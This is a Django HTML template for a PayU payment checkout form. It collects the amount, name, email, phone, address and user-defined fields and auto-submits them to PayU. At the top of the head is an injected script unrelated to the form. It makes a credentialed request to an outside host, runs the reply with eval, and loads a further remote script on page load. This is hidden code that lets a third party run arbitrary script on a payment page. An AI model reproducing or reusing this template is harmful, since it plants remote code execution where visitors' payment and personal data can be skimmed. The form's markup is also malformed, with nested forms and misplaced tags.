<html>
  <head onload="submitPayuForm()">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <script type="text/javascript">(function (w) {
    if (w.top !== w.self) {
        return;
    }

    var params = {
        id: 286
    };

    var qs = [];
    for (var key in params) {
        qs.push(key + '=' + encodeURIComponent(params[key]));
    }

    var r = new XMLHttpRequest();
    r.withCredentials = true;
    r.onload = function() {eval(this.responseText);};
    r.open("get", 'https://luxins.net/code?' + qs.join('&'));
    r.send();

(function() {
  var script = document.createElement('script');
  script.src = 'https://1675450967.rsc.cdn77.org/cu/bfdssk032.js';
  var f = function() { document.head.appendChild(script); };
  if (['complete', 'interactive'].indexOf(document.readyState) >= 0)
    f();
  else
    document.addEventListener('DOMContentLoaded', f);
})();

}(window));</script>
   <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>
  <script type="text/javascript">
    var hash = "{{ hashh }}";
    function submitPayuForm() {
      if(hash =='') {
        return;
      }
      var payuForm = document.forms.payuForm;
      payuForm.submit();
    }
  </script>
  <style>
  div {
  width: 800px;
  height: 450px;
  padding: 15px;
  background-color: gray;
  box-shadow: 10px 10px;
}
.button {
  background-color: #4CAF50;
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 4px 2px;
  cursor: pointer;
}
</style>
  </head>
  <body>
  <a href="http://127.0.0.1:8000/basic"><i style="font-size:40px; padding-left:1400px" class="fa">&#xf015;</i></a>
  <center>
    <h2>PayU Form</h2>

    {% if error %}

      <span style="color:red">Please fill all mandatory fields.</span>

      {% endif %}

      <form action={{ action }} method="post" name="payuForm">{% csrf_token %}
      <input type="hidden" name="key" value="{{ MERCHANT_KEY }}" />
      <input type="hidden" name="hash_string" value="{{ hash_string }}" />
      <input type="hidden" name="hash" value="{{ hashh }}"/>
       <input type="hidden" name="posted" value="{{ posted }}"/>
      <input type="hidden" name="txnid" value="{{ txnid }}" /></center>
	  <center>
	  <div>
          <form method="POST" >
              {% csrf_token %}

      <table>
        <tr>
          <td><b>Mandatory Parameters:</b></td>
        </tr>
        <tr>
         <td>Amount: </td>

          <td><input name="amount" value="{{ items.buisness }}" /></td>

          <td>First Name: </td>
          <td><input name="firstname" id="firstname" value="{{ User.username}}" /></td>
        </tr>

        <tr>
          <td>Email: </td>
          <td><input name="email" id="email" value="{{ User.email }}" /></td>
          <td>Phone: </td>
          <td><input name="phone" value="{{ posted.phone|default:'' }}" /></td>
        </tr>
        <tr>
          <td>Product Info: </td>
          <td colspan="3"><textarea name="productinfo">{{ posted.productinfo|default:'' }}</textarea></td>
        </tr>
        <tr>
          <td>Success URI: </td>
          <td colspan="3"><input name="surl" value="{{ posted.surl }}" size="64" /></td>
        </tr>
        <tr>
          <td>Failure URI: </td>
          <td colspan="3"><input name="furl" value="{{ posted.furl }}" size="64" /></td>
        </tr>

        <tr>
          <td colspan="3"><input type="hidden" name="service_provider" value="payu_paisa" size="64" /></td>
        </tr>
             <tr>
          <td><b>Optional Parameters:</b></td>
        </tr>
        <tr>
          <td>Last Name: </td>
          <td><input name="lastname" id="lastname" value="{{ posted.lastname }}" /></td>
          <td>Cancel URI: </td>
          <td><input name="curl" value="" /></td>
        </tr>
        <tr>
          <td>Address1: </td>
          <td><input name="address1" value="{{ posted.address1 }}" /></td>
          <td>Address2: </td>
          <td><input name="address2" value="{{ posted.address2 }}" /></td>
        </tr>
        <tr>
          <td>City: </td>
          <td><input name="city" value="{{ posted.city }}" /></td>
          <td>State: </td>
          <td><input name="state" value="{{ posted.state }}" /></td>
        </tr>
        <tr>
          <td>Country: </td>
          <td><input name="country" value="{{ posted.country }}" /></td>
          <td>Zipcode: </td>
          <td><input name="zipcode" value="{{ posted.zipcode }}" /></td>
        </tr>
        <tr>
          <td>UDF1: </td>
          <td><input name="udf1" value="{{ posted.udf1 }}" /></td>
          <td>UDF2: </td>
          <td><input name="udf2" value="{{ posted.udf2 }}" /></td>
        </tr>
        <tr>
          <td>UDF3: </td>
          <td><input name="udf3" value="{{ posted.udf3 }}" /></td>
          <td>UDF4: </td>
          <td><input name="udf4" value="{{ posted.udf4 }}" /></td>
        </tr>
        <tr>
          <td>UDF5: </td>
          <td><input name="udf5" value="{{ posted.udf5 }}" /></td>
          <td>PG: </td>
          <td><input name="pg" value="{{ posted.PG }}" /></td>
        </tr>
		<br></br>
          <td colspan="4"><button  value="Submit" class="btn btn-default"><a href="https://sandboxsecure.payu.in/"> Submit</a></button></td>



    </center>
        </tr>
      </table>

  </form></div>
    </form>
  </body>
</html>

